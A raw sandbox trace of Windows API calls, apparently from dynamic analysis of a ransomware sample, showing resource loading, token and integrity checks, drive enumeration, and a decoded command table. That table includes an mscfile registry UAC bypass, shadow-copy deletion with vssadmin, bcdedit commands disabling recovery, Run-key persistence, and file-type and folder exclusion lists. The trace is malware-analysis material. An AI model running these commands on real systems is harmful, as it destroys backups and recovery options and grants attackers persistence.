0x51c380 [0093.977] LoadResource (hModule=0x400000, hResInfo=0x51c380) returned 0x50d72c [0093.977] SizeofResource (hModule=0x400000, hResInfo=0x51c380) returned 0x582 [0093.977] LockResource (hResData=0x50d72c) returned 0x50d72c [0093.978] FreeResource (hResData=0x50d72c) returned 0 [0093.978] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0093.978] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0093.978] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0093.978] LockResource (hResData=0x50d64c) returned 0x50d64c [0093.978] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1361cc8, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0093.978] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1361cc8, cbMultiByte=38, lpWideCharStr=0x133deac, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0093.978] FreeResource (hResData=0x50d64c) returned 0 [0093.978] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0093.978] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x1361ccc, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0093.978] GetCurrentThreadId () returned 0xaf0 [0093.978] GetCurrentThreadId () returned 0xaf0 [0093.978] GetCurrentThreadId () returned 0xaf0 [0093.978] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1300e48, cbMultiByte=1410, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 1410 [0093.978] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1300e48, cbMultiByte=1410, lpWideCharStr=0x12faccc, cchWideChar=1410 | out: lpWideCharStr="%CD%\r\n%SystemRoot%\\system32\\cmd.exe\r\n%SystemRoot%\\system32\\shell32.dll\r\nreg copy \"HKCR\\mscfile\" \"HKCU\\Software\\Classes\\mscfile\" /s /f && reg add \"HKCU\\Software\\Classes\\mscfile\\shell\\open\\command\" /ve /t REG_EXPAND_SZ /d \"[MAIN_PATH]\" /f && \"[AE_PATH]\" & reg delete \"HKCU\\Software\\Classes\\mscfile\" /f\r\nprocess call create \"cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\"\r\nvssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\r\nCACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"\r\nreg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /v \"[HTA_NAME]\" /t REG_SZ /f /d \"\\\"[HTA_PATH]\"\\\"\r\ntype \"[FROM_PATH]\" > \"[TO_PATH]\"\r\ntype \"[FROM_PATH]\" > \"[TO_PATH]\" && \"[TO_PATH]\" [PARAMS]\r\nattrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"[FROM_PATH]\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"\r\nexplorer.exe \"[DIR_NAME]\" & type \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"\r\nreg add \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons\" /f && reg add \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons\" /v \"29\" /t REG_SZ /f /d \"[ICO_PATH],0\"\r\ntaskkill /f /IM explorer.exe && start explorer.exe\r\n") returned 1410 [0093.978] GetCurrentThreadId () returned 0xaf0 [0093.978] GetCurrentThreadId () returned 0xaf0 [0093.978] GetCurrentThreadId () returned 0xaf0 [0093.978] GetCurrentThread () returned 0xfffffffe [0093.978] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x8, OpenAsSelf=1, TokenHandle=0x12fc64 | out: TokenHandle=0x12fc64*=0x0) returned 0 [0093.978] GetLastError () returned 0x3f0 [0093.979] GetCurrentProcess () returned 0xffffffff [0093.979] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x12fc64 | out: TokenHandle=0x12fc64*=0xb8) returned 1 [0093.979] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x2, TokenInformation=0x12fee10, TokenInformationLength=0x400, ReturnLength=0x12fc60 | out: TokenInformation=0x12fee10, ReturnLength=0x12fc60) returned 1 [0093.979] CloseHandle (hObject=0xb8) returned 1 [0093.979] AllocateAndInitializeSid (in: pIdentifierAuthority=0x4e3754, nSubAuthorityCount=0x2, nSubAuthority0=0x20, nSubAuthority1=0x220, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x12fc5c | out: pSid=0x12fc5c*=0x1c6300*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0093.979] EqualSid (pSid1=0x1c6300*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0x12fee74*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 0 [0093.979] EqualSid (pSid1=0x1c6300*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0x12fee90*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0)) returned 0 [0093.979] EqualSid (pSid1=0x1c6300*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0x12fee9c*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0093.979] GetCurrentProcess () returned 0xffffffff [0093.979] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x12fc68 | out: TokenHandle=0x12fc68*=0xb8) returned 1 [0093.979] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x12fc64 | out: TokenInformation=0x0, ReturnLength=0x12fc64) returned 0 [0093.979] GetLastError () returned 0x7a [0093.979] LocalAlloc (uFlags=0x0, uBytes=0x14) returned 0x1c75a0 [0093.979] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x1c75a0, TokenInformationLength=0x14, ReturnLength=0x12fc64 | out: TokenInformation=0x1c75a0, ReturnLength=0x12fc64) returned 1 [0093.979] GetSidSubAuthorityCount (pSid=0x1c75a8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000)) returned 0x1c75a9 [0093.979] GetSidSubAuthority (pSid=0x1c75a8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000), nSubAuthority=0x0) returned 0x1c75b0 [0093.979] LocalFree (hMem=0x1c75a0) returned 0x0 [0093.979] CloseHandle (hObject=0xb8) returned 1 [0093.979] GetDriveTypeW (lpRootPathName="Z:\\") returned 0x1 [0093.979] GetDriveTypeW (lpRootPathName="Y:\\") returned 0x1 [0093.979] GetDriveTypeW (lpRootPathName="X:\\") returned 0x1 [0093.979] GetDriveTypeW (lpRootPathName="W:\\") returned 0x1 [0093.980] GetDriveTypeW (lpRootPathName="V:\\") returned 0x1 [0093.980] GetDriveTypeW (lpRootPathName="U:\\") returned 0x1 [0093.980] GetDriveTypeW (lpRootPathName="T:\\") returned 0x1 [0093.980] GetDriveTypeW (lpRootPathName="S:\\") returned 0x1 [0093.980] GetDriveTypeW (lpRootPathName="R:\\") returned 0x1 [0093.980] GetDriveTypeW (lpRootPathName="Q:\\") returned 0x1 [0093.980] GetDriveTypeW (lpRootPathName="P:\\") returned 0x1 [0093.980] GetDriveTypeW (lpRootPathName="O:\\") returned 0x1 [0093.980] GetDriveTypeW (lpRootPathName="N:\\") returned 0x1 [0093.980] GetDriveTypeW (lpRootPathName="M:\\") returned 0x1 [0093.980] GetDriveTypeW (lpRootPathName="L:\\") returned 0x1 [0093.981] GetDriveTypeW (lpRootPathName="K:\\") returned 0x1 [0093.981] GetDriveTypeW (lpRootPathName="J:\\") returned 0x1 [0093.981] GetDriveTypeW (lpRootPathName="I:\\") returned 0x1 [0093.981] GetDriveTypeW (lpRootPathName="H:\\") returned 0x1 [0093.981] GetDriveTypeW (lpRootPathName="G:\\") returned 0x1 [0093.981] GetDriveTypeW (lpRootPathName="F:\\") returned 0x1 [0093.981] GetDriveTypeW (lpRootPathName="E:\\") returned 0x1 [0093.981] GetDriveTypeW (lpRootPathName="D:\\") returned 0x1 [0093.981] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0093.981] FindResourceW (hModule=0x400000, lpName="NDNF", lpType=0xa) returned 0x51c420 [0093.981] LoadResource (hModule=0x400000, hResInfo=0x51c420) returned 0x516824 [0093.981] SizeofResource (hModule=0x400000, hResInfo=0x51c420) returned 0x267 [0093.981] LockResource (hResData=0x516824) returned 0x516824 [0093.981] FreeResource (hResData=0x516824) returned 0 [0093.981] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0093.982] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0093.982] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0093.982] LockResource (hResData=0x50d64c) returned 0x50d64c [0093.982] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1361cc8, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0093.982] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1361cc8, cbMultiByte=38, lpWideCharStr=0x133deac, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0093.982] FreeResource (hResData=0x50d64c) returned 0 [0093.982] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0093.982] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x1361ccc, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0093.982] GetCurrentThreadId () returned 0xaf0 [0093.982] GetCurrentThreadId () returned 0xaf0 [0093.982] GetCurrentThreadId () returned 0xaf0 [0093.982] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fee18, cbMultiByte=615, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 615 [0093.982] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fee18, cbMultiByte=615, lpWideCharStr=0x1304f7c, cchWideChar=615 | out: lpWideCharStr="[NF_START]\r\nAST\r\nAFN\r\nELST\r\nEXE\r\nLNK\r\nHTA\r\nPEK\r\nSEK\r\nB10CKED\r\nTMP\r\nICO\r\n000\r\nSYS\r\nDAT\r\nRTF\r\nINF\r\nDLL\r\nDAT\r\nREG\r\nDRV\r\nDEV\r\nPIF\r\nMBR\r\nINI\r\nXML\r\nLIST\r\nTTF\r\nLOG\r\nJA\r\nCOM\r\nBAT\r\nCMD\r\nVBS\r\nJS\r\nCFG\r\nDOWNLOAD\r\nNFO\r\nMSI\r\nCHK\r\nDMP\r\nMUI\r\nDUN\r\nISP\r\nISW\r\nCAB\r\nEFI\r\nHLP\r\nMSU\r\nHLP\r\nBIN\r\nLNG\r\nTORRENT_INFO\r\nTORRENT\r\nHTM\r\nHTML\r\nCHM\r\nLANG\r\nSTYLE\r\nMP3\r\nFLAC\r\nOGG\r\nWMA\r\nGIF\r\nJAVA\r\nCUR\r\nANI\r\n[NF_END]\r\n[ND_START]\r\n\\WINDOWS\r\n\\PROGRAM FILES\r\n\\GAMES\r\n\\APPDATA\\\r\n\\APPLICATION DATA\\\r\n\\LOCAL SETTINGS\\\r\n\\TEMP\\\r\n\\PROGRAMDATA\\\r\n\\BOOT\\\r\n\\MSOCACHE\\\r\n\\DEFAULT USER\\\r\n\\SAMPLE\r\n\\EXAMPLE\r\n\\I386\r\n\\TEMPORARY\r\n\\TOR BROWSER\\\r\n\\BROWSER\r\nBROWSER\\\r\n[ND_END]") returned 615 [0093.982] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[NF_START]", cchCount2=10) returned 2 [0093.982] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.982] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.982] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.982] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.982] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.982] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.982] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.982] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.982] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.982] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.982] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.982] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.982] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="000", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.982] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SYS", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.982] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.982] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.982] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.982] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.983] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.983] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.983] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DRV", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.983] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEV", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.983] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PIF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.983] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBR", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.983] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.983] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.983] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LIST", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.983] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TTF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.983] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.983] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JA", cchCount1=2, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.983] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="COM", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.983] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BAT", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.983] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CMD", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.983] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.983] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JS", cchCount1=2, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.983] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CFG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.983] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOWNLOAD", cchCount1=8, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.983] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NFO", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.983] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.983] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHK", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.983] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DMP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.983] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MUI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.983] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DUN", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.983] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.983] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISW", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.983] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CAB", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.983] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EFI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.983] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.983] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSU", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.983] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.983] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BIN", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.983] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.983] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT_INFO", cchCount1=12, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.983] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT", cchCount1=7, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.983] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTM", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.983] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTML", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.983] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHM", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.983] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LANG", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.983] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="STYLE", cchCount1=5, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.983] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MP3", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.984] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FLAC", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.984] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OGG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.984] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WMA", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.984] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GIF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.984] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JAVA", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.984] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CUR", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.984] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ANI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.984] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_END]", cchCount1=8, lpString2="[NF_END]", cchCount2=8) returned 2 [0093.984] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.984] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.984] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.984] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.984] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.984] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.984] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.984] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.984] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.984] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.984] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.984] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.984] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="000", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.984] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SYS", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.984] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.984] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.984] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.984] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.984] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.984] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.984] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DRV", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.984] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEV", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.984] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PIF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.984] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBR", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.984] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.984] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.984] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LIST", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.984] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TTF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.984] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 